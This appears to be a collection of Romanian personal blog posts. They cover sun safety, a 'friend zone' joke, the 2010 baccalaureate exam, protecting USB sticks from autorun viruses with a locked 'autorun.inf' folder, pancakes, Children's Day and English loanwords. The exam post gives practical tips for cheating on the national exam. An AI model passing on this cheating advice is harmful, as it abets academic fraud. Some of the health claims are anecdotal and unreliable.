Intr-adevar, exista metode de protectie. Majoritatea se dau cu creme si uleiuri si alte prostii si asta in general e un lucru bun. Dar din cate am inteles, conteaza mult cantitatea pe care o folosesc, si ca trebuie folosita multa solutie, altfel efectul este foarte slab. In plus, se mai folosesc “solutii traditionale” ca uleiul de masline sau alte tampenii. Dupa parerea mea, asta e cea mai mare prostie, la fel ca o mare parte din leacurile traditionale. Sunt niste lucruri netestate si nu ajuta de multe ori decat din punct de vedere psihologic (negativ as spune eu) facand persoana in cauza sa se simta mai in siguranta cand de fapt ea probabil nu este. Acesta cel putin e parerea mea.

Statul in soare schimba culoarea pielii, dar asta nu inseamna ca trebuie sa stai toata ziua in soare. Daca stai prea mult, pielea (epiderma) se arde. Si asta se poate simti, mie, dupa mai mult timp de stat in soare, mi se pare ca mi se strange pielea pe mine. Aceste simptome sunt mascate de vantul care adie sau de miscarea corpului. Astfel poate sa apara si cancerul de piele.

Pe langa problemele de piele, pot sa apara si alte probleme. Corpul uman are o temperatura de aproximativ 37 de grade Celsius. Dar stand in soare, deci la o temperatura mai mare, acesta primeste caldura de la mediu, deci temperatura sa creste. Dupa cum ar trebui sa stiti de la fizica, caldura provoaca dilatare. Astfel, si la corpul uman, din cauza caldurii se dilateaza vasele de sange, si inima trebuie sa depuna un efort mai mare pentru a iriga corpul. Si de la asta pleaca problemele: pe la 39-40 de grade te ia cu ameteala, pe la 40-41 incepe sa ti se faca rau si nu te mai tii bine pe picioare (muschii nu sunt irigati indeajuns de mult, la fel si creierul) si se poate ajunge la lesin sau chiar la moarte. Pentru asta insa ar fi o solutie simpla: intra din cand in cand in apa, stai putin sa te racoresti, apoi poti iesi. Ar fi de preferat sa bagi si capul putin in apa, chiar daca esti fata si voi sunteti “altfel” cu “baile pe cap”.

Insa cand intri in apa, nu o face brusc. Adica nu sari in apa dupa ce ai stat la soare. Temperatura corpului este mare, inima pompeaza repede sange, si aruncandu-te in apa, temperatura corpului scade brusc si poti face infarct. Am auzit de mult astfel de cazuri. In plus, am facut si eu prostia asta, eram incins de la soare, si am sarit in apa. Cred ca o secunda, doua nu mai stiu cum a fost, apoi eram ametit prin apa si a trecut putin timp sa constientizez ca sunt in apa si sa ma ridic. Am avut noroc pentru ca era apa calda.

Un alt lucru important cand stai mult in soare este consumul de apa. Cred ca e mult mai bine sa bei niste apa decat o prostie de suc. La soare transpiri mult, pierzi lichide, si organismul are nevoie de ele.

Cam asta voiam sa va spun, sper sa va ajute la ceva. Maine ma duc la piscina

Citatul se refera la relatia de dragoste intre baiat si fata si de… prietenie dintre fata si baiat ?

O sa intelegeti cand veti citi. O sa traduc eu din engleza, sa nu va chinuiti voi. Nu voi traduce mot-a-mot pentru a prinde mai bine ideile de baza.

O fata are un prieten foarte apropiat. Asta inseamna probabil ca el este interesat de ea din moment ce se invarte atat de mult in jurul ei. Ea insa il priveste strict ca pe un prieten. Asa este intotdeauna: “Esti un baiat super, dar nu te plac in acel sens”. Este echivalentul unui baiat care se duce la o firma sa se angajeze si compania spune: “Ai un CV foarte bogat, ai toate calitatile pe care le cautam, dar nu te vom angaja. Totusi, vom folosi CV-ul tau ca punct de plecare pentru ceilalti care vor sa fie angajati. Dar probabil vom angaja pe cineva care este mult mai putin calificat decat tine si probabil este un alcoolic. Daca nu se va descurca, vom angajape altcineva, dar tot nu pe tine. De fapt, nu te vom angaja niciodata, dar te vom suna din cand in cand sa ne plangem de persoana pe care am angajat-o”.

Ce pot sa spun, imi place foarte mult analogia folosita care este si perfect adevarata. M-am aflat in aceasta situatie, si cred ca si unii dintre voi v-ati aflat. Oricum, nu se rezuma numai la baieti. Este foarte posibil ca si fetele sa treaca prin astfel de clipe deloc placute dupa parerea mea.

Aceste situatii se pot termina urat, nu atat de urat pentru persoanele care doresc sa se “angajeze”, cat pentru “angajatori” care risca sa piarda un “colaborator” valoros pentru ca acesta nu se multumeste cu acest statut, lucru usor de inteles.

Originalul este acesta:

DragonflyBlade21: A woman has a close male friend. This means that he is probably interested in her, which is why he hangs around so much. She sees him strictly as a friend. This always starts out with, you’re a great guy, but I don’t like you in that way. This is roughly the equivalent for the guy of going to a job interview and the company saying, You have a great resume, you have all the qualifications we are looking for, but we’re not going to hire you. We will, however, use your resume as the basis for comparison for all other applicants. But, we’re going to hire somebody who is far less qualified and is probably an alcoholic. And if he doesn’t work out, we’ll hire somebody else, but still not you. In fact, we will never hire you. But we will call you from time to time to complain about the person that we hired.

PS: Aceste situatii se pot termina si cu o “angajare”

Sa incepem cu noile modificari. Nu se mai da ca inainte la sport, ceea ce cred ca era un lucru bun, ci se dau alte materii pe parcursul semestrului al II-lea din clasa a XII-a: limba romana oral (februarie), engleza/franceza: listening (se asculta un text si se raspunde la intrebari grila pe baza acelui text), scris (se citeste un text si pe baza sa se raspunde la intrebari grila) + scrierea unui articol, sa a unei scrisori, apoi in alta zi, probabil ziua urmatoare e proba orala (aprilie), si proba de competente digitale (Microsoft Office, informatii legate de Internet si alte prostii, pe calculator). Avantajul ar fi ca nu poti pica la aceste probe, ci la limba romana si la competente poti fi utilizator experimentat, avansat, mediu si ce o mai fi, iar la engleza/franceza e cu calificative: A1, A2, B1, B2, cel din urma fiind cel mai mare. A, si poate pe unii o sa ii incante ca vor primii diplome pentru fiecare dintre aceste materii, desi nu stiu daca vor folosi la ceva.

Probele scrise, la 3 materii, au suferit si ele cateva schimbari. Se dau la sfarsitul lunii iunie, cam la 2 saptamani dupa terminarea liceului. Limba romana da toata lumea, a doua materie se da in functie de profil: matematica sau istorie, si a III-a proba tot in functie de profil, la alegere: informatica, fizica, biologie, chimie, filozofie, economic… Cred ca in functie de profil.

Sunt multe mituri legate de exemenul de bacalaureat, multe adevarate, dar si mai multe false. Cele mai multe sunt despre faptul ca se copiaza.

Pentru ca supraveghetorii sa lase elevii sa copieze sunt importante mai multe aspecte: ce fel de oameni sunt, ce fel de elevi sunt in sala, ce parere au cei din comisie si altele. Nu va bazati pe faptul ca veti copia totul si sa nu stiti absolut nimic, se poate sa nu se poata misca in sala, dar se poate si sa zboare foile.

Oricum, la copiat ideea e simpla: fa-o subtil. Daca vorbesti cu cineva vorbeste incet, daca dai/iei ciorna cuiva, ai grija sa nu se auda de la 2 km. E posibil ca supraveghetorii sa nu zica nimic daca te vad, dar de ce sa te risti? Foarte rar e dat cineva afara din examen, dar se mai intampla si asta.

Tot legat de copiat, sa vedem care sunt solutile. In primul rand, nu mai apar pe Internet variantele, astfel nu veti mai putea veni cu toate variantele rezolvate si sa copiati tot sa luati 10. La limba romana romana se poate veni cu foi cu comentarii (eu am avut fasii mici, am facut in Word comentariile pe 4 coloane, cu text mic, font 5-6 si am scos la imprimanta), sau cu acele carticele (memoranduri) care au comentariile, dar la matematica, fizica, informatica sau alte materii nu mai merge. Bine, poti lua carticele cu formule cum am avut eu, dar ma uitam la ele ca mata in calendar, nu stiam ce sa fac cu ele.

Un bun mijloc de copiat e “colegul”. Dar trebuie sa ai langa tine pe cineva care se pricepe. Intre colegi apropiati (ca locuri in banci) se poate schimba ciorna foarte usor. Luati si voi cate 2 ciorne, si rezolvarile sa se dea pe ciorne, nu pe alte hartiute. Daca te misti usor si cand trebuie, poti da/lua ciorna unui coleg chiar daca ai niste supraveghetori “nesimtiti”.

Mai sunt si alte prostii pentru copiat: ceasuri cu card, dar la care trebuie sa apesi pe butoane pana iti sar capacele sa derulezi, casti, dar e cam greu de discutat si se poate intampla sa nu mai iasa, si daca un supraveghetor e aproape de tine si vorbeste la telefon e posibil sa faca urat casca si multe alte prostii, de cele mai multe ori inutile.

Eu nu va sfatuiesc sa copiati. De fapt va sfatuiesc sa faceti asta, dar subtil, si sa nu riscati foarte mult decat daca e absolut necesar. A, daca puteti copia, faceti-o la nesimtire, copiati tot ce puteti. Si sa nu cumva sa uitati de “colegi”.

Sa va spun cum a fost cand am dat eu probele. La romana ne-au spus din start ca nu ne lasa cu foi, dar ne-au lasat sa vorbim incet intre noi. Si eu ma mai ridicam in picioare sa vad la colega din fata, si scriam putin pana sa bata un supraveghetor cu ceva in catedra sa stau jos, apoi ma ridicam din nou. La matematica a fost mai bine. Eram vreo 4-5 unul langa celalalt, si toti eram paraleli cu matematica. In sala erau decat vreo 2-3 fete care cica se pricepeau, dar erau departe de noi, sau nu dadeau nimic. Am schimbat ciornele intre noi, am vorbit, mai tare sau mai incet, dar tot nu am facut prea mult. La informatica eram doar 4 care dadeam. Nu am fost singuri in sala, dar am vorbit incet intre noi si ne-am dat ciornele reciproc si am facut lucrarile cam la fel, insa la asta ne descurcam toti, mai bine zis ne verificam intre noi.

Si dupa 4 ani in care nu am invatat mai nimic, am luat 8,25 la romana (nici nu stiam cum se cheama basmul ala exact, credeam ca e “Harap Alb si merele de aur”, norocul meu a fost ca am auzit pe cineva in clasa zicand ceva de span, apoi mi-am dat seama ca zmeul e din alta poveste), la matematica am facut singur de 5, poate chiar 5,5, am copiat doar punctul 6 de la I, si inca un subpunct de la II, dar nici nu am stiut ce sa copiez, era pe o ciorna ceva cu “lambda” si eu “destept”: “Ba, nu are cum sa fie cu lambda, cred ca ala e un X scris urat”, si am pus x, in final am luat 6,05 si la informatica stiu ca am facut totul bine, m-am uitat si pe barem, am luat 9,2, voiam 10. In total media a fost 7,83, sunt multumit pentru ca nu imi trebuie decat 5% unde dau mai departe.

Rezultatele nu au aparut sambata pe Internet cand zicea toata lumea ca apar, ci duminica pe la 11-12 s-au afisat la scoala, si cam in acest timp cred ca au aparut si pe Internet.

Am ajuns cu inca o colega la rezultate, primii din clasa. Nu faceti asta, am dat vreo 50 de telefoane… Acolo era haos. Cam nimeni nu era multumit, doar cei ca mine, cei cu 7-8, in rest nu, nici macar cei cu 9 si ceva nu erau prea incantati. Mi-a parut rau de o fata care plangea pe acolo, cred ca picase…

Totusi la mine la liceu a fost foarte bine, au picat decat vreo 6-7. Am facut cateva calcule:

Jud. Valcea:

Trecuti: 3397
Picati: 1196
Total: 4593
Picati: 26%

Pe tara:

Trecuti: 136254
Picati: 73,832
Total: 210086
Picati: 35%

Pe tara: 131 cu 10.00

E un adevarat dezastru. In Bucuresti spuneau la stiri ca au picat 41%. Am inteles ca prin Bacau/Buzau era un liceu la care au picat toti elevii. Si majoritatea au picat la matematica.

Nu as putea spune ca exista egalitate. Una e sa dai la istorie unde s-au luat numai note de 8-9-10, alta e sa dai la matematica unde s-au luat note de 1,5-2-3-4…La matematica au fost foarte grele subiectele.

Si cel mai nasol lucru a fost ca MULTI care nu au invatat niciodata nimic, au avut noroc si au copiat pe rupte, si au luat mai mult decat unii care au invatat 4 ani.

Contestatii au fost o gramada, insa nu cred ca se rezolva cine stie ce asa. Dar am auzit de multe cazuri de lucrari aproape identice intre ele, cu o diferenta de 1-2 puncte intre ele la nota. Rezultatele la contestatii vor aparea pe 8. Sunt curios ce va mai fi atunci.

Desigur, mediile de anul acesta au fost mult mai mici decat cele de anul trecut pentru ca: nu tu 10 la romana oral, nu tu 10 la engleza oral si nu tu 10 la sport.

Cei care au dat bacul anul acesta nu sunt vinovati pentru ca nu s-au nascut la timpul potrivit. Noi doar am nimerit prost.

Acesta a fost bac-ul din anul 2010 din perspectiva mea. Pe scurt, cred ca cel mai “jegos” bac dintre toate de pana acum.

Bafta celor care dati anul viitor!

Mai intai trebuie sa intelegeti cum se intampla aceste lucruri. Sa vorbim mai intai despre copierea automata a unui virus pe stick. Asta e simplu: din moment ce calculatorul e infectat cu acel virus, acel virus ruleaza si verifica la un anumit interval de timp, sau monitorizeaza, introducerea unui stick. Verifica apoi tipul noului “disk”, daca este “Removable” este stick, si se autocopiaza acolo, scriind inca un fisier (autorun.inf – mai jos detalii), si incercand sa se ascunda. Modalitatea de ascundere nu e tocmai extrem de eficace, nu poate face mare lucru, doar sa se copieze apoi sa faca acel fisier Hidden (in calculator exista unele fisiere ascunse, orice fisier se poate ascunde -> Click dreapta pe el >> Properties >> Bifati Hidden >> Apply >> Ok). De multe ori mai creaza un folder cu numele RECYCLER sau alt nume si se copiaza in el.

Dar cum se auto-copiaza in calculator cand se introduce un stick? La fel de simplu. Cand se copiaza, mai scrie si un fisier numit “autorun.inf”. Iar Windows, dragutul sistem de operare, la introducerea unui CD sau stick, citeste acel fisier si gaseste ceva de genul:

[autorun]

open=autorun.exe

icon=autorun.ico (Optional)

Cam asa arata majoritatea, pot fi mai complexe si pot face mai multe lucruri cum ar fi adaugarea de noi optiuni la click dreapta sau setarea unei iconite, ceea ce face acel “icon=”, insa virusul nu are nevoie de mai multe. Ce se afla dupa “open=” e locatia executabilului care va fi executat la introducerea unui stick sau a unui CD, iar virusul va scrie acolo locatia in care s-a ascuns, si va fi rulat la introducerea stickului. La rulare, se va auto-copia in calculator, il va infecta si va astepta introducerea unui nou stick victima.

Dar ce face un astfel de virus? Sunt tot felul de prostii care nu fac mare lucru, dar sunt o mare parte dintre ei, e la moda, fura tot felul de parole, din browser de cele mai multe ori, dar si din tot felul de programe, unele si parolele de la messengerul vostru cel de toate zilele.

Puteti verifica foarte usor daca aveti un virus pe stick, deschizandu-l (dati click dreapta pe el, apoi Explore. Daca dati dublu click pe el se va rula virusul daca stickul e infectat). Desigur, nu va va sari in ochi pentru ca este ascuns, va trebui sa setati Windows sa afiseze fisierele ascunse. Pentru asta, avand stick-ul deschis (daca aveti Vista sau Windows 7 apasati mai intai un F10 sa apara bra de meniu), dati Tools >> Folder options >> Alegeti Tab-ul View >> Selectati Show hidden files, folders and drives si debifati si Hide protected operating system file (unii virusi se pot seta ca fiind fisiere de sistem ce sunt implicit ascunse) >> Apply >> Ok si ar trebui sa va apara fisierele ascunse (apar mai “sterse” iconitele). Daca nu va apar (intrati pe partitia cu Windows-ul, probabil C:\) si daca acolo nu vedeti nici un astfel de fisier sau folder care era ascuns, adica daca nu vedeti nimic cu iconita mai “stearsa”, inseamna ca aveti deja un virus care va impiedica sa le vedeti. Daca va aflati intr-o astfel de pozitie lasati un comentariu si sa explic ce trebuie sa faceti. Revenind la ale noastre, ar trebui sa apara ceva de genul:

Ceea ce apare mai sters “bu8.exe” si “System Volume Information” sunt un fisier si un folder implicit ascunse. Nu toate folderele/fisierele ascunse sunt “rele”. De exemplu, “System Volume Information” e folosit pentru System Restore, o facilitate a sistemului de operare care va permite sa readuceti sistemul la forma la care era acum ceva timp. Nu dau detalii, nu are rost. De multe ori, daca e un virus veti vedea niste fisiere sau un folder “Recycler” sau “Recycled”. In Windows astfel de foldere se folosesc pentru fisierele care ajung in Recycle Bin, dar daca vedeti pe stick astfel de foldere va recomand sa le stergeti, la fel ca pe alte fisiere suspecte.

Sa revenim la exemplul meu. Dupa cum vedeti e acolo un fisier dragut numit “bu8.exe”. Nu stiu ce face, dar cum am deschis stick-ul, antivirusul m-a alertat ca acel fisier este un virus, Trojan Horse, care poate face multe.  Ce facem? Il stergem pur si simplu. Dar deja sunteti infectat poate, deci il stergeti degeaba, a scapa de un virus e uneori un proces dificil si sunt multi virusi, nu pot explica pentru fiecare in parte ce anume trebuie facut.

Atentie! Sa nu incepeti sa stergeti fisierele ascunse de pe alte partitii, de exemplu de pe C:\. Bine, pe marea lor majoritate nu le veti putea sterge, dar unele sunt utile. Aici vorbesc despre stickuri.

Acum sa trecem la ce era mai inportant. Cum ne putem proteja stickurile de virusi?

Si asta e foarte simplu. Un virus daca nu e executat s-a copiat degeaba. Nu prezinta nici un pericol. Asadar nu trebuie sa impiedicam virusul sa se copieze, in schimb trebuie sa il impiedicam sa creeze pe stick acel fisier, “autrun.inf”. Daca am crea un alt fisier cu acest nume, virusul va putea sa il stearga (bine, cred ca putem face niste “smecherii” ca sa nu poata fi sters) dar sa lucram cat mai simplu. Windows-ul nu permite ca in aceeasi locatie sa se afle si un folder si un fisier cu acelasi nume. Asadar solutia “rapida” e sa cream pur si simplu un folder numit “autorun.inf”. Nu cred ca sunt mai mult de 5% de astfel de virusi care “se gandesc” ca poate fi un folder cu acest nume, si cand incearca sa stearga acel (cum cred ei) fisier nu vor reusi. Deci nu vor scrie acel fisier, si la introducerea stick-ului in alt calculator virusul nu se va executa, asa cum nu s-a executat nici la mine.

Daca va deranjeaza acel folder creat de voi si numit “autorun.inf”, il puteti ascunde, dar e de preferat sa il lasati vizibil, si daca veti deschide stickul si nu il veti vedea inseamna ca un virus a reusit sa il stearga, nu e imposibil.

Putem incerca sa protejam acel folder sa fie sters (nu e chiar necesar, dar eu va recomand sa faceti si asta), modificandu-i permisiunile. Permisiunile reprezinta ceea ce poate sa se faca si ceea ce poate sa nu se faca cu acel folder, insa ele pot fi modificate si de un virus de exemplu, insa nu cred ca exista unul care sa faca asa ceva.

Pentru a-i seta permisiunile dati click dreapta pe el >> Properties >> Alegeti Tab-ul Security >> Click pe Everyone >> Edit. Se va deschide o fereastra noua in care putem seta ce sa se poata face cu acel folder, bifam in coloana Deny optiunea Full Control si se vor bifa si celelalte. Dam Apply apoi Ok, si nu se va mai putea face nimic cu acel folder, nu va putea fi sters, nici macar deschis pana nu sunt modificate permisiunile. De exemplu, daca incercam sa il stergem (de la linia de comanda):

RmDir G:\autorun.inf
Access is denied.

Nu il vom putea sterge.

Daca ati executat pasii de mai sus nu ar trebui sa va mai faceti griji ca veti lua virusi pe stick. Atentie, acest lucru nu va protejeaza 100%, dar in masura de 98% stickurile vor fi in siguranta.

Sper ca ati inteles si ca va va ajuta acest articol.

Totul a inceput cand am vrut prima oara sa fac clatite. Ma duc prin Kaufland si caut tot ce se putea pune in niste clatite. Stiam si eu ca se pune lapte/apa minerala, faina si oua, dar nu stiam cate, insa am incercat.

Sa incep mai intai cu ultima reteta, care a functionat foarte bine:

- 3 oua (1,5 RON)

- cam 700 de g de faina(2,5 RON)

- 1 litru de lapte(3,5 RON)

- 2 tubulete de esenta de rom (optional) (1,5 RON)

- 2 pliculete de zahar cu aroma de rom (optional, mie mi-au sarit in ochi) (0,5 RON)

- 2 pliculete de praf de budinca (asta am folosit la ultima reteta, in rest am folosit un pliculet de praf de frisca) – ingredientul meu secret (2 RON)

- o cutie mica de Finetti (2,5 RON – optional)

Cam astea ar fi cele necesare, preturile sunt aproximate, in total ar costa cam 11,5 RON, dar majoritatea ingredientelor le puteti gasi in casa.

Sa trecem la modul de preparare. Eu disting 2 tipuri de clatite: clatite subtiri si clatite groase. Voua care va plac? Pentru a alege un astfel de tip e simplu: clatitele subtiri se fac folosind o coca moale, iar cele groase, cum le fac eu, folosind o coca mai groasa. Diferenta e si in timpul de preparare si in numarul de clatite rezultate. Cele subtiri se fac mult mai repede, dar ies mai multe, in schimb cele groase ies mai putine si se fac mai greu.

Sa trecem la treaba. Nu stiu exact care e ordinea normala in care se adauga ingredientele, mai intai cred ca se pune faina, sa nu se faca apoi cocolosi, dar eu nu gandesc atat de mult, pentru mine toate intra in acelasi bol, deci nu dau foarte multa importanta ordinii, eu oricum le amestec foarte bine. Totusi, mai intai pun faina, apoi restul ingredientelor, lasand la final laptele.

Daca ati pus cat am specificat mai sus, ar trebui sa iasa bine compozitia pentru clatite groase (cred ca nu puneti si Finetti in coca). Dupa ce se adauga toate ingredientele se amesteca bine. E foarte bine daca nu are cocolosi. Bine, e posibil sa aiba unii mici, deoarece e groasa coca si nu se poate face perfecta, dar nu sunt o problema.

Acum ca am terminat cu coca, sa alegem o tigaie. Dar care? Eu am incercat sa fac in 2 tigai: una simpla, mica, si una mare, de teflon. Diferenta dintre ele este ca in cea simpla se fac mai repede, se incinge mai repede, dar se pot arde si se pot lipi destul de usor de ea. In cea de teflon se fac mai greu, dar nu se lipesc (daca nu va grabiti sa le luati si sa le intoarceti). In plus, cea de teflon pare sa le coaca intr-un fel, adica se fac bine si la interior, ceea ce o face mai buna pentru clatitele groase. Dar asta nu inseamna ca o tigaie simpla nu e buna, eu am facut de mai multe ori clatite in tigaie simpla decat in tigaie de teflon, trebuie insa sa le dezlipiti usor sa nu se arda, eu nu le las sa se arda. Pentru asta puteti folosi un cutit, eu folosesc o chestie de plastic, nu stiu ce e si la ce se foloseste, dar merge perfect. Mai jos puteti vedea cum arata niste clatite subtiri facute de mine:

Pentru inceput punem tigaia pe foc sa se incalzeasca. Nu prea tin cont de cum e focul, mare sau mic, eu il las putin mai mare sa nu adorm langa tigaie. Dupa ce se incinge bine, puteti arunca cateva picaturi de apa sa verificati, se pune putin ulei. Nu e chiar necesar in tigaia de teflon, dar in cea simpla e recomandat. Eu folosesc si in cea de teflon sa fiu mai sigur ca nu le ard.

Dupa ce se incinge, cu un polonic mare, eu il iau plin varf, dar e mai bine sa il luati aproape plin, se pune intr-o parte a tigaii si se intinde pe toata tigaia, sa fie uniform. Se va intinde putin mai greu decat va asteptati probabil, pentru ca va fi o coca groasa, dar nu e nici o problema.

Dupa ce am pus compozitia, asteptam. Va trebui sa verificam daca e gata pe acea parte din cand in cand. Atentie, la tigaia de teflon cel putin, daca nu se dezlipeste, nu fortati, nu e inca gata, aveti putina rabdare. Cand o sa fie gata, daca miscati putin mai tare de tigaie in lateral (nu foarte incet) ar trebui sa se dezlipeasca. Daca se dezlipeste decat o parte, mai asteptati putin. In tigaia simpla, verificati cu cutitul sau tot miscand asa de tigaie. Daca e gata (nu va speriati daca in tigaia de teflon va fi putin maro, cred ca asa e cel mai bine sa fie, nu sunt arse, sunt foarte bune) o puteti intoarce, si puteti face vechea schema cu aruncatul lor in aer. Veti putea face asta fara probleme deoarece clatitele sunt groase si nu veti avea probleme. Vor fi mici diferente in functie de cata coca ati pus deci in functie de cat de groase vor iesi. Eu am facut si clatite care la “aterizare” se auzea ca si cum ar fi cazut un bolovan in tigaie. M-a ajutat la biceps.

In functie de cat de omogena e compozitia, atat de frumos se va face si cea de-a doua parte. Nu o sa iasa chiar ca prima, dar nu o sa iasa urat. Aveti grija sa nu o ardeti pe aceasta parte, dar nici sa le lasati prea putin si sa nu fie facute. Faceti cateva incercari si o sa va dati seama cum sta treaba. Oricum, de cele mai multe ori nu iese deloc bine prima clatita. Daca nu va place ceva, mai puteti face modificari la compozitie, puteti sa mai puneti lapte si sa o faceti mai moale de exemplu.

Si cam asa se fac si restul, primele nu o sa iasa excelent, dar urmatoarele o sa iasa foarte bine. Insa trebuie si sa va placa sa faceti clatite. Eu sunt foarte grijuliu cand fac pentru ca nu le fac pentru mine, le fac pentru… anumite persoane, fete.

Dupa ce se fac le umpleti cu ce doriti: Finetti, miere, gem/dulceata… Fiecare dupa gusturile sale.

Dar nu intotdeauna mi-a iesit bine compozitia, eu am incercat unele lucruri… noi. Am incercat o data sa folosesc suc in loc de lapte, si am ales Capy. Si cum nu stiu ce a fost in capul meu, am pus si cacao in compozitie. Rezultatul? Ganditi-va ca intr-un pahar va puneti Capy si puneti cacao peste… Mai jos puteti vedea cum arata:

Am mai incercat sa fac si folosind Coca-Cola si praf de prajituri, insa am pus mult astfel de praf, putina faina, si nu se prindeau, si nu a iesit nimic. Asta insa nu ma va descuraja in a incerca alte noi ingrediente pentru clatite, deja am unele idei, dar le pastrez pentru mine, deoarece nu cred ca sunt exagerat de bune.

Pofta buna.

Desigur, cei care se tot considera “maturi”, desi probabil nici nu inteleg semnificatia acestui cuvant, vor considera ca pastrand un suflet de copil esti o persoana imatura. Fals.Prefer sa fiu o astfel de persoana imatura, dar sa pastrez in mine o parte din inocenta copilariei decat sa imi uit trecutul, sa uit jocurile si veselia copilariei.

Cum ar putea uita cineva clasicele cantecele: “Alunelu, Alunelu hai la joc”, sau poeziile “Catelus cu parul cret”, sau jocurile ca “Tara, tara vrem ostasi”, “Tarile” si multe altele. Acum cand scriu despre ele, chiar mi se face pofta sa joc un astfel de joc. De fapt ar fi chiar interesant ca niste oamenii la aproape de 20 de ani sa se apuce sa se joace astfel de jocuri. Eu ma bag, se mai ofera cineva?

Eram insa curios cum a aparut aceasta zi si de ce pe 1 iunie. Wikipedia mi-a raspuns. Prima oara a fost sarbatorita in Turcia in 1920. Iar in 1925 a fost mentionata pentru prima oara la o conferinta mondiala pentru adoptarea Declaratiei pentru Protectia Copiilor. Iar in 1954 UNICEF a recomandat ca fiecare tara sa aiba o astfel de zi. In jur de 30 de state o sarbatoresc pe 1 iunie idee preluata de la China si SUA, dar alte state o sarbatoresc in alte zile.

Am fost, suntem si vom fi copii.

Se poate observa in viata de zi cu zi cum limba engleza pune stapanire tot mai mult pe noi, iar noi incepem sa dam din ce in ce mai multa importanta si sa vorbim mai mult in limba engleza. Dar de ce?

Totul face parte din istorie, si din imperiile coloniale din trecut. Astfel, deoarece Marea Britanie si Franta aveau cele mai multe si mai mari colonii, limba engleza si limba franceza sunt astazi foarte vorbite pe intreaga planeta.

Iar urmatorul pas important in aceasta expansiune a limbii engleze a fost extinderea brusca a Internetului, iar limba engleza, fiind foarte simpla si cunoscuta, a devenit un fel de limba oficiala a Internetului, si nu numai, a devenit o limba standard.

Insa care ar fi problema in faptul ca suntem din ce mai interesati de aceasta limba? Simplu, nu e nici o problema in asta, problema e ca se vorbeste romana din ce in ce mai prost, si mai ales, ca limba romana incepe sa fie amestecata cu limba engleza. In plus, in limba romana se introduc foarte multe cuvinte din limba engleza.

Un factor important in aceasta “englezire” a romanilor il reprezinta si muzica. Deschid televizorul si dau pe Kiss FM. Ascult 20 de melodii de exemplu. Cate din ele sunt melodii in limba romana? Maxim 2-3. Restul, engleza… Sincer, prefer manelele mele, prefer greselile ortografice ale lor, macar manelele au versuri in limba romana. Nu sunt manelele de vina pentru ca unele persoane vorbesc foarte prost limba romana, cred ca aceasta se datoreaza altor genuri muzicale. Bine, aici ii inteleg si pe artisti. Cum limba engleza e una universala, melodiile in limba engleza pot fi promovate in orice tara, pe cand cele in limba romana se rezuma la tarisoara noastra draga.

Un alt lucru usor de remarcat il reprezinta statusurile de pe messenger. De ce dracu sa pui un status in limba engleza, cand mesajul e de tot rahatul? A, pentru ca e mai “cool”. Esti mai cool daca pui statusul in limba engleza. Nu vad de ce as pune un status in limba engleza, cand pot sa il pun in limba romana. Bun, suna altfel in limba engleza, dar tradus e acceasi porcarie… A, macar daca s-ar folosi o engleza decenta, nu engleza de balta pe care o vezi la toate statusurile, si daca ii intrebi ceva in engleza pe “posesorii” statusurilor, o sa iti raspunda cu “tu da bi da best”. Eu nu suport nici acel “DND”. De ce DND si nu ND (Nu deranja)?

Ca sa nu mai spun cat pot uri amestecarea limbii romane cu limba engleza in tot felul de discutii. Why sa scriu a shit ca asta? Si asta e cool? Nu stiu cum sunteti voi, dar eu sunt mai de moda veche, mie mi-a placut si imi place limba romana. Prefer o limba in care un cuvant are un singur inteles si mai multe sinonime, decat o limba in care cu un cuvant exprimi un roman.